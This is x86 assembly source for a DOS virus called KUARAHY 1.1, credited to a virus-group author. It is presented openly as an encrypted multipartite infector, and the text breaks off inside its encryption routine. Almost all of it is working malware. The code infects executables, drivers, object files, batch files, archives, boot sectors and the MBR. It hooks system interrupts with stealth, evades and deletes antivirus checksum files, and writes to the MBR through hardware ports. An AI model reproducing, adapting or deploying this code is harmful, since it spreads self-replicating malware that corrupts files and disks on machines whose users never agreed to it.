Comment % ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Multipartite COM/EXE/OVL/SYS/OBJ/BAT/ARJ/RAR/BS/MBR encrypted fast infector ³ ³ 10 different targets ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ V ßßßÛ ÜÛß Û Û ÜßßßßÜ ßÛßßßßÜ ÜßßßßÜ Û Û Û Û I Û ÜÛ Û Û Û Û Û Û Û Û Û Û ßÛ Ûß R ÛÛÛ Û Û ÛÜÜÜÜÛ ÛÜÜÜÜß ÛÜÜÜÜÛ ÛÜÜÜÜÛ ßÛÜÛß U Û ßÛÜ Û Û Û Û Û Û Û Û Û Û Û S Û ÛÜÜ ÛÜÜÜÜß Û Û Û ßÛ Û Û Û Û Û Version 1.1 ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Programmed by Int13h of IKX Virus Group (Int13h@antisocial.com) ³ ³ Made in Paraguay - South America ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ In this upgraded version I added infection of RAR type of files, it drops itself in an encrypted form over ARJ and RAR archives in rnd files. Tunnels by PSP tracing. Anti-tunneling.BS/MBR stealth on reads. Two ways of hooking Int 21h. Doesn't infects some lame programs. Protects Int 21h in AX=2521h and AX=3521h. Uses SFT. Doesn't infects philes inmunized with CPAV & EXEs with overlays. Deletes AV checksum philes. Infects MBR by direct writing to HD ports. A cool payload activates on days 13. It consists in a change of the default text mode character set. Formats an extra track in floppies. It doesn't have a poly engine, but a routine to change pointer, keyword and operation in the main decryptor. The MBR can be infected from all the infected hostes. Does other stuph. > > > Greetz to IKX members and to all my IRC-friends < < < % ; Compile under Turbo Assembler 4.0 and Turbo Link 6.10 from Borland Intl. .model tiny .code jumps ; Lazyness r0x0r .186 org 0h Longitud = (offset FakeHoste-offset Kuarahy) Largor = (offset Omega-Offset Kuarahy) HeaderSize = (EndRARHeader-RARHeader) ParraVir1 = ((Longitud+15)/16)+1 ParraVir2 = ((Longitud+15)/16) VirusEnPara = (Largor+15)/16 KUARAHY:jmp MuLTiSuCKeo ; KUARAHY.4774 nop org 03eh MuLTiSuCKeo: db 0beh ; mov si... Pointer:dw offset Encriptado+07c00h mov cx,0d8h Descifra: db 02eh db 081h,034h ; xor word ptr [si],... ClaveB dw 0 inc si inc si Marca: loop Descifra Encriptado: cmp word ptr ds:[0],020cdh ; Check 4 PSP jne Desde_Boot_o_MBR ; looking the INT 20h at field 0 jmp Desde_un_Phile ; Execution from a file Desde_Boot_o_MBR: ; Execution from MBR or BS sub ax,ax cli mov ss,ax ; Set SS:SP mov sp,07c00h sti cld push ss pop ds int 12h sub ax,12 ; Eat 12kb! mov ds:[0413h],ax mov cl,6 shl ax,cl mov es,ax ; ES is our new house at TOM mov si,07c00h xor di,di mov cx,256 repe movsw ; Move virus first part at TOM mov ax,0209h ; Read the other sectors where the mov bx,offset ParteII ; virus body is stored cmp byte ptr es:[DondeEstamos],'F' je FDisk ; Check if we are in a FD or HD mov cx,0003h ; Track 0, Sector 3 mov dx,0080h ; Head 0 jmp short Uplodearse FDisk: mov cx,5002h ; Track 80, Sector 2 sub dx,dx ; Head 0, drive A: Uplodearse: int 13h mov ax,0209h int 13h jc Vamonos push es mov bx,offset Arriba push bx retf ; Jump to our segment! DondeEstamos db 'F' Revisar db 'S' Cuenta db 0 ARRiBa: mov ax,32d call Desde_un_Phile ; Decrypt encrypted virus body mov byte ptr cs:[Cuenta],0 ; Initialize vars mov byte ptr es:[Revisar],'S' mov byte ptr es:[Bandera],'N' mov ax,word ptr ds:[13h*4] ; Hook the kewlest int :) mov word ptr es:[Offset_de_la_13h],ax mov word ptr ds:[13h*4],offset Nueva13Handler mov ax,word ptr ds:[(13h*4)+2] mov word ptr es:[Segmento_de_la_13h],ax mov word ptr ds:[(13h*4)+2],es mov ax,0201h ; Read MBR mov bx,offset MBRBS mov cx,0001h mov dx,0080h pushf call dword ptr cs:[Offset_de_la_13h] jc Vamonos ; Grrr! cmp word ptr es:[bx+offset Marca],0f7e2h je Vamonos ; Infected? mov byte ptr es:[DondeEstamos],'H' push ds push es pop ds xor di,di Reutilizar: mov ax,0301h ; Write original MBR mov bx,offset MBRBS mov cx,0002h ; Track 0, Sector 2 mov dx,0080h ; Head 0 int 13h mov byte ptr cs:[QueEs],'b' push di ds es mov bp,020fh ; Generate an encrypted copy call Encriptor pop es ds di mov si,offset ParaOuting mov bx,offset CopiaVirus ; Infect MBR via ports call Direct_HD_Write_Using_Ports mov ax,0309h ; Write the virus body to other sectors mov bx,offset CopiaVirus+200h mov cx,0003h mov dx,0080h int 13h cmp di,32 ; Check our flaggy jne StillWeGo ret StillWeGo: pop ds mov byte ptr es:[DondeEstamos],'F' Vamonos: cmp byte ptr es:[DondeEstamos],'F' ; FD or HD? je Floppy mov dx,0080h ; Head 0 mov cx,0002h ; Track 0, sector 2 jmp short CargarOriginal Floppy: xor dx,dx ; Head 0, drive A: mov cx,5001h ; Track 80, sector 1 CargarOriginal: push ds pop es mov bx,07c00h mov ax,0201h ; Load original MBR or BS int 13h mov ax,0201h int 13h db 0eah ; Execute the sucker dw 07c00h dw 0 Nueva13Handler: call kill_tunnel cmp ax,0cd13h ; Are you there? je Chequeo cmp ah,03h ; Writing? je Hookear_Int21h cmp ah,02h ; Reading? jne Normal cmp cx,0001h ; Track 0, sector 1? jne Normal test dx,dx ; Head 0, drive A:? je Infectar cmp dx,0080h ; Head 0, hard disk? je Stealth_MBR Normal: db 0eah Offset_de_la_13h dw 0 Segmento_de_la_13h dw 0 Stealth_MBR: push cx mov cl,02h ; Read original MBR in user's buffer int 13h pop cx retf 2 Stealth_BS: push ax push cx push dx mov ax,0201h xor dx,dx mov cx,5001h ; Read original BS in fool's buffer pushf call dword ptr cs:[Offset_de_la_13h] mov ax,0201h pushf call dword ptr cs:[Offset_de_la_13h] pop dx pop cx pop ax retf 2 db " >KUARAHY< Koa ha'e Int13h/IKX rembiapoku‚ hina! :) " org 1feh db 55h,0aah org 200h ; First sector ParteII label byte ; Second virus part follow Desde_un_Phile: db 0beh ; mov si... Puntero dw 020fh mov cx,((Largor-200h)-0fh)/2 Decrypta: db 02eh db 081h,034h ; xor word ptr [si],... ClaveF dw 0 inc si inc si loop Decrypta cmp ax,32 jne Getear_Delta ret Getear_Delta: call Delta Delta: pop bp sub bp,offset Delta cmp byte ptr cs:[bp+QueEs],'S' je Strategy_Routine ; Is a .SYS hoste? mov ax,0cd13h ; Are you there? int 21h cmp ax,013cdh jne Instalar jmp MemoriaYaPodrida ; Yes, I am Instalar: push es mov ax,3521h ; Get INT 21h handler int 21h mov cs:[bp+word ptr Abuela21h],bx mov cs:[bp+word ptr Abuela21h+2],es mov cs:[bp+word ptr Real21h],bx mov cs:[bp+word ptr Real21h+2],es push ds lds bx,ds:[0006h] ; Trace PSP. 10x SLH Tracear:cmp byte ptr ds:[bx],0eah jne Chekear lds bx,ds:[bx+1] cmp word ptr ds:[bx],9090h jnz Tracear sub bx,32h cmp word ptr ds:[bx],9090h jne Chekear Hallado:mov cs:[bp+word ptr Real21h],bx mov cs:[bp+word ptr Real21h+2],ds jmp short MCBTSR Chekear:cmp word ptr ds:[bx],2e1eh jnz MCBTSR add bx,25h cmp word ptr ds:[bx],80fah je Hallado MCBTSR: pop ds mov ax,0cd13h ; Is virus TSR from BS or MBR? int 13h cmp ax,013cdh jne ModificarMCB ; No, then go and play with MCBs push bx ; Yes it is, viral segment in BX pop es ; We will hook INT 21h directly push cs pop ds lea si,cs:[bp+word ptr Abuela21h] mov di,offset Abuela21h ; Fill our variables movsw movsw lea si,cs:[bp+word ptr Real21h] mov di,offset Real21h movsw movsw xor ax,ax mov es,ax cli mov di,21h*4 ; And hook the int mov ax,offset Viral21Handler stosw mov ax,bx stosw sti pop es jmp MemoriaYaPodrida ModificarMCB: mov ax,ds ; TSR via MCB dec ax mov es,ax mov ax,es:[3] sub ax,ParraVir1 xchg bx,ax push ds pop es mov ah,4ah ; Free unused mem int 21h mov ah,48h ; Allocate mem mov bx,ParraVir2 int 21h dec ax mov es,ax mov word ptr es:[1],8 ; DOS's mov word ptr es:[8],'Ky' ; Block name: KY (Kuarahy) inc ax mov es,ax xor di,di push cs pop ds lea si,[bp+offset Kuarahy] mov cx,Longitud rep movsb ; Copy virus to our segment mov byte ptr es:[Bandera],'N' push es pop ds mov ax,2521h ; Hook the int mov dx,offset Viral21Handler int 21h pop es MemoriaYaPodrida: mov ax,0cafeh ; Call MBR infection service int 21h cmp byte ptr [bp+QueEs],'C'; COM? je CorrerCOM cmp byte ptr [bp+QueEs],'B'; BAT? je CorrerBAT cmp byte ptr [bp+QueEs],'O'; OBJ? je CorrerOBJ xor di,di cmp byte ptr [bp+QueEs],'A' ; ARJ? je CorrerARJ_RAR cmp byte ptr [bp+QueEs],'R' ; RAR? je CorrerARJ_RAR ; EXE/OVL file mov ah,2ah ; Get date int 21h cmp dl,13d ; Day=13? jne SigaNomas mov di,32 push es bp call CorrerARJ_RAR ; Change text fonts pop bp es xchg cx,ax int 16h SigaNomas: push es pop ds mov bx,bp mov ax,es add ax,10h ; Acount 4 PSP add cs:[(bx+CS_IP)+2],ax cli add ax,cs:[(bx+SS_SP)+2] mov ss,ax mov sp,cs:[bx+SS_SP] sti call Limpiar ; Clear regs db 0ebh,0h ; Clear prefetch queue db 0eah ; Restore control to .EXE CS_IP dw offset FakeHoste,0h SS_SP dw 0,0 CorrerCOM: ; COM file call Segmentos lea si,[bp+offset Vafer] ; Points to original bytes mov di,100h push di cld movsb ; Restore them movsw Limpiar:xor ax,ax sub bx,bx xor cx,cx sub dx,dx xor si,si sub di,di xor bp,bp ret ; Run COM or return to caller CorrerBAT: ; BAT file call segmentos mov ax,word ptr ds:[2ch] ; Fill the table mov word ptr [bp+FCB1],cs ; for 4bh execution mov word ptr [bp+FCB2],cs mov word ptr [bp+PSP],ax mov word ptr [bp+SLINEA],cs mov es,word ptr ds:[2ch] ; Environment segment sub ax,ax mov di,1 Look4Zero: dec di scasw ; Look 4 doble-zero jnz Look4Zero inc di ; Points to filename inc di push es pop ds push cs pop es ; Copy filename to our buffer mov si,di lea di,[bp+offset RARHeader] mov cx,128d rep movsb push cs cs pop ds es ; CS=DS=ES sub al,al ; Look for the 0 of the ASCIIZ string lea di,[bp+offset RARHeader] mov cx,125d repne scasb mov word ptr [di-4],'AB' ; Change extension to .BAT mov byte ptr [di-2],'T' mov si,80h ; Command line dec di mov cl,byte ptr ds:[80h] ; Quantity of characters xor ch,ch inc cl mov si,81h rep movsb lea si,[bp+offset Linea] ; Move all to the command line in PSP mov di,080h Otravez:lodsb cmp al,0dh ; ENTER? 0dh je Termino stosb jmp OtraVez Termino: stosb sub di,81h mov cx,di ; Calculate new lenght mov byte ptr ds:[080h],cl ; Update offset 80h of PSP cli mov sp,6000d ; Reajust stack sti mov ah,4ah ; Free memory mov bx,(Largor+4000)/16 int 21h lea dx,[bp+offset RunMe] mov ax,4b00h ; Execute the sucker lea bx,[bp+offset PSP] int 21h mov ah,4dh ; Get exit code int 21h ; ERRORLEVEL mov ah,4ch ; And exit to DOS int 21h CorrerOBJ: ; OBJ file (COM when compiled) call Segmentos lea si,[bp+offset Copier] ; Point to our little code mov di,64000 ; Copy it in the heap mov ax,di mov cx,5 rep movsw movsb lea si,[bp+offset Omega] ; Points to hoste mov di,100h ; Destination offset push di mov cx,60000 xor bx,bx xor dx,dx jmp ax Copier: repe movsb ; Move host at 100h, in memory xor si,si sub di,di xor ax,ax sub cx,cx ret ; Give control to him CorrerARJ_RAR: ; ARJ/RAR file call Segmentos mov ah,9 ; Copyright lea dx,[bp+offset Copyright] int 21h mov cx,26d lea si,[bp+offset Letras] mov bp,si mov dx,'A' Cicling:push cx mov ax,1100h mov bx,0e00h ; Change text fonts mov cx,01 int 10h inc dx add bp,14 pop cx Loop Cicling cmp di,32 jne SaleAlDos ret SaleAlDOS: ; EXIT to DOS if ARJ/RAR, acting int 20h ; like a shareware program :) Viral21Handler: ; KUARAHY handler of INT 21h call kill_tunnel cmp ax,0cd13h ; Resident check je Chequeo cmp ax,0cafeh ; MBR sucking service je InfectarMBR cmp ah,04bh ; Execution je Analizar cmp ah,056h ; Rename je Analizar cmp ah,043h ; Get/Set attribs je Analizar cmp ah,3dh ; Open je Analizar cmp ax,6c00h ; Extended open je Analizar cmp ax,03521h ; Protect Int 21h je Ocultar21h_A cmp ax,02521h ; Protect Int 21h je Ocultar21h_B cmp ax,05700h ; Hide wrong seconds je Stealth_Segundos1 cmp ax,05701h ; Protect wrong seconds je Stealth_Segundos2 db 0eah ; Normal INT normal Abuela21h dw 0,0 Ocultar21h_A: ; Give him the old handler mov bx,cs:[word ptr Abuela21h] mov es,cs:[word ptr Abuela21h+2] iret Ocultar21h_B: ; Put him as the old handler mov cs:[word ptr Abuela21h],dx mov cs:[word ptr Abuela21h+2],ds iret Stealth_Segundos2: push dx push cx mov ax,5700h pushf call dword ptr cs:[Real21h] and cl,00011111b cmp cl,00011110b jne Tranquilopa pop cx and cl,11100000b or cl,00011110b ; Still marked as infected push cx Tranquilopa: pop cx pop dx mov ax,5701h pushf call dword ptr cs:[Real21h] iret Stealth_Segundos1: ; Hide wrong seconds pushf call dword ptr cs:[Real21h] push cx and cl,00011111b cmp cl,00011110b jne NoPasaNada pop cx and cl,11100000b or cl,1 push cx NoPasaNada: pop cx iret Manejador24h: ; Error handler mov al,03 iret Analizar: ; Check DS:DX 4 victims pushf push ax bx cx dx si di bp ds es cmp ax,6c00h jne No_Apertura_Extendida cmp dx,0001 jne JustPOPs mov dx,si No_Apertura_Extendida: push dx ds mov ax,3524h ; 24h handler int 21h mov word ptr cs:[Vieja24h],bx mov word ptr cs:[(Vieja24h)+2],es push cs pop ds mov ax,2524h ; Hook it mov dx,offset Manejador24h int 21h pop ds dx mov word ptr cs:[Victima],dx mov word ptr cs:[Victima+2],ds mov bx,ds push ds pop es cld mov di,dx mov cx,128 mov al,'.' ; Search the . repne scasb jnz PopAll mov ax,word ptr es:[di-3] ; Check name or ax,02020h cmp ax,'dn' ; commaND je PopAll cmp ax,'na' ; scAN / cleAN / tbscAN / tbcleAN je PopAll cmp ax,'va' ; tbAV / nAV je PopAll cmp ax,'to' ; fool-prOT je PopAll cmp ax,'dr' ; guaRD je PopAll cmp ax,'ur' ; findviRU je PopAll cmp ax,'ti' ; toolkIT je PopAll cmp ax,'pv' ; aVP je PopAll cmp ax,'ni' ; wIN je PopAll cmp ax,'pl' ; ifshLP je PopAll push cs pop es mov si,offset Cabecera xchg si,di ; Check extension movsw movsb call Segmentos call Checar_Ext jc PopAll Abrir: mov ax,3d00h ; Open in read-only mode pushf call dword ptr cs:[Real21h] jc PopAll xchg bx,ax push cs pop ds mov byte ptr ds:[DondeEstamos],'H' push es bx mov ax,1220h int 2fh mov ax,1216h xor bh,bh mov bl,es:[di] int 2fh mov cl,byte ptr es:[di+4] ; Manipulate SFT mov byte ptr [AtribsFile],cl mov byte ptr es:[di+4],20h mov byte ptr es:[di+2],2 mov word ptr [SFT],di mov word ptr [SFT+2],es pop bx es mov ax,4301h mov dx,offset Basura1 sub cx,cx pushf call dword ptr cs:[Real21h] mov ah,41h ; Delete AV checksum files mov dx,offset Basura1 int 21h mov ah,41h mov dx,offset Basura2 int 21h mov ah,41h mov dx,offset Basura3 int 21h mov ah,41h mov dx,offset Basura4 int 21h mov ax,5700h ; Get time/date pushf call dword ptr ds:[Real21h] mov word ptr ds:[Time],cx mov word ptr ds:[Date],dx mov word ptr ds:[TimeDate+2],dx and cl,00011111b cmp cl,00011110b ; 30*2= ¨60? jne Conti ; Infected? jmp PopAll Conti: mov ah,3fh ; Read 45 bytes mov cx,45d mov dx,offset Cabecera int 21h mov si,dx mov ax,[si] jmp SaltarAdondeCorresponda InfectarCOM: ; .COM infection push bx mov ah,30h int 21h pop bx cmp al,7 ; No activity if DOS >=7 jae Cerrar call AlFinal test dx,dx jnz Cerrar cmp ax,58000d ; Check size ja Cerrar cmp ax,666d jbe Cerrar cmp word ptr [si+11d],'TW' ; Sucked with CPAV? je Cerrar mov di,offset Vafer ; Take original bytes movsw movsb sub ax,3 mov word ptr [Salto+1],ax mov bp,ax add bp,312h ; Encrypt virus call Encriptor mov cx,Largor mov dx,offset CopiaVirus mov ah,40h int 21h ; Infect file with the encrypted copy call AlInicio mov ah,40h ; Put the JMP mov cx,3 mov dx,offset Salto int 21h jmp SalteAqui InfectarEXE: ; .EXE infection cmp byte ptr [QueEs],'S' je Cerrar cmp word ptr [si+018h],0040h jae Cerrar cmp word ptr [si+01ah],0000 jne Cerrar ; Overlay? cmp word ptr [si+43d],'TW' ; Sucked with CPAV's code? je Cerrar call AlFinal mov cx,512d div cx or dx,dx je NoHayResto inc ax NoHayResto: cmp word ptr [si+02h],dx jne Cerrar cmp word ptr [si+04h],ax jne Cerrar call AlFinal ; EXE infection in the usual way push bx push dx ax ; Size to stack les ax,dword ptr [(Cabecera+014h)] mov [CS_IP],ax mov [(CS_IP+2)],es les ax,dword ptr [(Cabecera+0eh)] mov word ptr [SS_SP],es mov word ptr [(SS_SP+2)],ax mov ax,word ptr [(Cabecera+08h)] mov cl,4 shl ax,cl xchg bx,ax pop ax dx ; Size from stack push ax dx sub ax,bx sbb dx,0 mov cx,10h div cx mov word ptr [(Cabecera+014h)],dx mov bp,dx mov word ptr [(Cabecera+016h)],ax mov word ptr [(Cabecera+0eh)],ax mov word ptr [(Cabecera+010h)],0 pop dx ax add ax,Largor adc dx,0 mov cl,9 push ax shr ax,cl ror dx,cl or dx,dx stc adc dx,ax pop ax and ah,1 mov word ptr [(Cabecera+4)],dx mov word ptr [(Cabecera+2)],ax mov ax,word ptr [(Cabecera+0ah)] clc add ax,VirusEnPara jc NoAgregarMemoria mov word ptr [(Cabecera+0ah)],ax NoAgregarMemoria: mov word ptr [(Cabecera+0ch)],0ffffh pop bx add bp,20fh call Encriptor mov cx,Largor mov ah,40h mov dx,offset CopiaVirus int 21h call AlInicio mov ah,40h ; Write new header mov cx,01ah mov dx,offset Cabecera int 21h SalteAqui: call PongoFecha ; Restore time/date call Reatributear ; & attributes Cerrar: mov ah,3eh ; Close sucker int 21h PopAll: push cs pop ds mov ax,2524h lds dx,dword ptr cs:[offset Vieja24h] int 21h ; Restore Error Handler JustPOPs: pop es ds bp di si dx cx bx ax popf jmp dword ptr cs:[Abuela21h] InfectarSYS: ; .SYS infection cmp byte ptr [QueEs],'S' jne Cerrar mov ax,word ptr [si+6] ; Strategy routine mov word ptr [Vieja_Estrategica],ax call AlFinal mov word ptr [Cabecera+6],ax ; Point strategy routine to the second virus decryptor add word ptr [Cabecera+6],offset Desde_un_Phile mov bp,ax add bp,20fh ; Encrypt the viruz call Encriptor mov cx,Largor mov ah,40h mov dx,offset CopiaVirus ; Write to the .SYS int 21h call AlInicio mov ah,40h mov cx,10 ; Write modified SYS header mov dx,offset Cabecera int 21h jmp SalteAqui Strategy_Routine: ; .SYS strategy routine db 0b8h Vieja_Estrategica dw 0 push ax bx cx dx si es ds ; Old strategy routine in the stack push cs cs pop ds es mov ax,0cd13h ; Virus in memory? int 13h cmp ax,013cdh je Checar_Payload ; If it is resident, then MBR=infected mov ax,0201h ; Read MBR lea bx,[bp+offset Omega] mov cx,1 mov dx,0080h int 13h cmp word ptr es:[bx+offset Marca],0f7e2h je Checar_Payload ; Infected? mov ax,0301h ; Write MBR to sector 2 mov cx,2 int 13h mov word ptr es:[bp+offset ClaveF],0 mov si,bp push si add si,offset Pointer ; Modify offset in the 1§ decryptor mov word ptr [si],offset Encriptado+07c00h pop bx lea si,[bp+offset ParaOuting] ; Infect MBR using ports call Direct_HD_Write_Using_Ports mov ax,0309h ; Write virus body in contiguos sectors lea bx,[bp+offset ParteII] mov cx,0003h mov dx,0080h int 13h Checar_Payload: mov ah,04 ; Get date int 1ah cmp dl,013h ; Day=13? jne Popear call Epsilon Epsilon:pop bx sub bx,offset Epsilon lea si,[bx+offset Copyright] mov cx,(offset Hehe-offset Copyright)-1 Payload:lodsb sub bx,bx mov ah,0eh ; Print copyright int 10h loop Payload xor ax,ax ; Pause int 16h Popear: pop ds es si dx cx bx sub ax,ax ret ; Jump to original strategy routine InfectarOBJ: ; .OBJ infection cmp byte ptr [QueEs],'O' jne Cerrar call AlInicio xor di,di OtroCampo: call Lectura cmp al,0a0h ; Kewlest field type ;) jz ModificarValor cmp al,0a2h jz ModificarValor ; Look on OBJ infection tutorial cmp al,8ah ; for more info jz Ultimo cmp al,8ch jz Cerrar Punterear: mov ax,4201h ; Move pointer to the following xor cx,cx ; field int 21h jnc OtroCampo jmp Cerrar ModificarValor: push dx mov ax,4201h sub cx,cx cwd int 21h push dx ax ; Save current pointer location mov ah,3fh mov cx,3 ; Read 3 bytes mov dx,offset Entrada int 21h or di,di ; Checking flag jnz NoEsElPrimerA0 inc di ; Modify flag state ; IP=100h? cmp word ptr [Entrada+1],100h je NoEsElPrimerA0 cli add sp,6 ; Correct stack pointer sti jmp Cerrar NoEsElPrimerA0: ; Modify offset in memory, adding the virus size to it add word ptr [Entrada+1],Largor pop dx cx push cx dx mov ax,4200h ; Move pointer back int 21h mov ah,40h mov dx,offset Entrada ; Write modified field mov cx,3 int 21h pop dx cx mov ax,4200h ; Correct pointer position int 21h pop dx jmp Punterear Ultimo: mov cx,0ffffh ; Pointer to the last field (8a) mov dx,0fffdh mov ax,4201h int 21h mov cx,6 mov dx,offset VirusOBJRecord mov ah,40h ; Write a field for our virus, with int 21h ; IP=100h then when compiled we will ; have Virus+Hoste mov bp,030fh call Encriptor ; Generate an encrypted virus mov ah,40h mov cx,Largor mov dx,offset CopiaVirus ; Write our encrypted code int 21h mov ah,40h mov cx,10 ; Write the ending field mov dx,offset Finalizacion int 21h jmp SalteAqui ; And dirty work is finished ; Let's the user start his compiler >:) InfectarBAT: ; .BAT infection call PongoFecha ; Mark BAT as infected push es call Reatributear ; Restore his attribs pop es mov ah,3eh ; And close it int 21h lds si,dword ptr cs:[Victima] mov di,offset Filename ; Recover filename mov dx,di mov cx,128 Followtheblind: lodsb cmp al,'.' ; Wait for the period je Completa stosb ; Copy to our buffer Loop Followtheblind Completa: stosb ; Store the . push cs pop ds mov word ptr [di],'OC' mov word ptr [di+2],004dh ; Adds .COM+0 mov ah,3ch ; Create that file mov cx,20h int 21h jc PopAll xchg bx,ax push dx mov bp,030fh ; Create encrypted virus copy call Encriptor mov cx,Largor mov ah,40h ; And write that to the phile mov dx,offset CopiaVirus int 21h mov ah,3eh ; Now close it int 21h pop dx push dx mov ax,03d02h ; Open it pushf call dword ptr cs:[Real21h] xchg bx,ax call PongoFecha ; Mark as infected mov ah,3eh ; Close it int 21h pop dx mov ax,4301h mov cx,23h ; Set read-only+hidden attributes pushf call dword ptr cs:[Real21h] jmp PopAll db 'NIHIL ASSEMBLER MAIUS!' InfectarRAR: cmp ax,06153h ; It was a "Ra"? jne Cerrar call Segmentos mov di,offset RARname ; Points to the name mov cx,4 call Changer ; Make a random name mov bp,030fh ; Create encrypted virus copy call Encriptor mov ax,4202h cwd xor cx,cx ; Go to EOF int 21h mov si,offset CopiaVirus mov cx,Largor call CRC32 ; Get our CRC mov word ptr [RARCRC32+2],dx mov word ptr [RARCRC32],ax ; Save it in our RARheader mov si,offset RARHeader+2 ; Make CRC of header mov cx,HeaderSize-2 call CRC32 mov word ptr [RARHeaderCRC],ax mov ah,40h mov dx,offset RARHeader ; Write our header mov cx,HeaderSize int 21h mov word ptr [RARHeaderCrc],0 mov word ptr [RARCrc32],0 ; Blank CRC values mov word ptr [RARCrc32+2],0 mov dx,offset CopiaVirus mov cx,Largor ; ADD the encrypted virus mov ah,40h int 21h jmp SalteAqui InfectarARJ: ; .ARJ infection. Thanks to call Segmentos ; my kewl friend Star0/IKX! mov di,offset Agregar ; Points to the name mov cx,4 call Changer ; Get a random name mov bp,030fh ; Create encrypted virus copy call Encriptor mov ax,4202h xor cx,cx ; Go to EOF cwd int 21h xchg cx,dx mov dx,ax sub dx,4 sbb cx,1 add cx,1 mov ax,4200h ; Move our pointer int 21h mov si,offset CopiaVirus mov cx,Largor ; Calcule CRC of our code call CRC32 mov word ptr [ArjCrc32],ax mov word ptr [ArjCrc32+2],dx mov ah,40h mov cx,offset SecondSide-HeaderARJ mov dx,offset HeaderARJ int 21h mov cx,ArjHeaderCrc-ArjHsmsize mov si,offset ArjHsmSize call CRC32 mov word ptr [ArjHeaderCrc],ax mov word ptr [ArjHeaderCrc+2],dx mov ah,40h mov cx,EndSide-SecondSide mov dx,offset SecondSide int 21h mov word ptr [ArjCrc32],0 ; Blank variables mov word ptr [ArjCrc32+2],0 mov word ptr [ArjHeaderCrc],0 mov word ptr [ArjHeaderCrc+2],0 mov ah,40h mov cx,Largor mov dx,offset CopiaVirus ; Drop an encrypted virus copy int 21h mov word ptr [ArjHeadSiz],0 mov ah,40h mov cx,4 mov dx,offset HeaderARJ int 21h jmp SalteAqui Reatributear: ; Restore attribs using SFT les di,dword ptr cs:[SFT] mov cl,byte ptr cs:[AtribsFile] mov byte ptr es:[di+4],cl ret SaltarAdondeCorresponda: ; Check out what to infect cmp ax,'ZM' je InfectarEXE cmp ax,'MZ' ; EXE je InfectarEXE cmp byte ptr [QueEs],'C' ; It is COM? je InfectarCOM cmp al,080h ; Begings with 80h? It is an OBJ je InfectarOBJ inc ax jz InfectarSYS ; FFFF+1=0 then device driver? cmp byte ptr [QueEs],'B' ; Is a batch one je InfectarBAT cmp byte ptr [QueEs],'A' ; ARJ file je InfectarARJ cmp byte ptr [QueEs],'R' ; RAR file je InfectarRAR jmp Cerrar Changer: ; Generates random name for the push cx ; file that we will add to the .ARJ mov cx,25 ; RND between 0-25 call Get_RND add ax,64 ; A-Z stosb pop cx loop Changer ret Contador dw 0 ; Infection counter Copyright db 13,10,' [KUARAHY 1.1 by Int13h/IKX] - Written in Paraguay - Please register! ',13,10,'$' Hehe db 'DOS Infection Machine',2 Bandera db 'N' Salto db 0e9h,00h,00h ; 4 jmp construction db ' Learn some guaran¡ words!:' db 'Kuarahy=Sun A¤ =Devil Ku¤ =Woman ' Vafer db 090h,0cdh,020h ; Original COM bytes Targets db 'execomsysobjbatovlarjrar'; Infectable extensions QueEs db 'E' ; Hoste flag Real21h dw 0,0 ; Original 21h handler PongoFecha: inc word ptr cs:[Contador] ; Update counter mov ax,5701h db 0b9h Time dw 0 ; Restore date/time and mark as and cl,11100000b ; an infected one or cl,00011110b db 0bah Date dw 0 pushf call dword ptr cs:[Real21h] ret db ' E-mail me: Int13h@antisocial.com ' AlInicio: ; For pointer movements mov ax,04200h jmp short Despl AlFinal:mov ax,04202h Despl: xor cx,cx cwd int 21h ret Segmentos: ; DS:=CS & ES:=CS push cs cs pop ds es ret Get_RND:push dx ; Random # Generator push di in ax,40h mov dx,106 mul dx add ax,1283 mov di,6075 adc dx,0 div di mov ax,dx mul cx div di pop di pop dx inc ax ret Hookear_Int21h: ; Try to hook int 21h cmp byte ptr cs:[Revisar],'S' jne Retornemos ; Check the flag... inc byte ptr cs:[Cuenta] ; Update our counter cmp byte ptr cs:[Cuenta],8 ; 8 writes, we will hook Int 21h then jbe Retornemos push ds push ax push bx xor ax,ax mov ds,ax ; DS=IVT mov ax,word ptr ds:[21h*4] ; Fill our vars mov bx,word ptr ds:[(21h*4)+2] mov word ptr cs:[Abuela21h],ax mov word ptr cs:[Abuela21h+2],bx mov word ptr cs:[Real21h],ax mov word ptr cs:[Real21h+2],bx cli ; Hook Int 21h mov word ptr ds:[21h*4],offset Viral21Handler mov word ptr ds:[(21h*4)+2],cs sti mov byte ptr cs:[Cuenta],0 ; Clear counter mov byte ptr cs:[Revisar],'N' pop bx pop ax pop ds Retornemos: jmp Normal ; Normal INT 13h Encriptor: ; Virus's encryptor call Segmentos mov word ptr [Puntero],bp ; Pointer for 2§ decryptor sub bp,01c2h ; Calculate the pointer for mov word ptr [Pointer],bp ; 1§ decryptor in al,40h xchg ah,al in al,40h ; Get keyword for 2§ decryptor mov word ptr [ClaveF],ax xor si,si mov di,offset CopiaVirus mov cx,Longitud ; Copy virus to buffer rep movsb mov si,offset CopiaVirus+020fh mov ax,word ptr [ClaveF] mov cx,((Largor-200h)-0fh)/2 Proseguir: xor word ptr [si],ax ; Encrypt Kuarahy inc si inc si loop Proseguir in al,40h xchg ah,al in al,40h ; Get keyword for 1§ decryptor mov word ptr [ClaveB],ax mov cx,300 ; Get a random operation XOR/SUB/ADD call Get_RND mov di,offset ClaveB-2 cmp ax,100 ja SUBEAR mov cl,1 ; XOR mov ax,03481h stosw mov di,offset Rotar mov ax,0431h stosw jmp Oima SUBEAR: cmp ax,200 ja ADDEAR mov 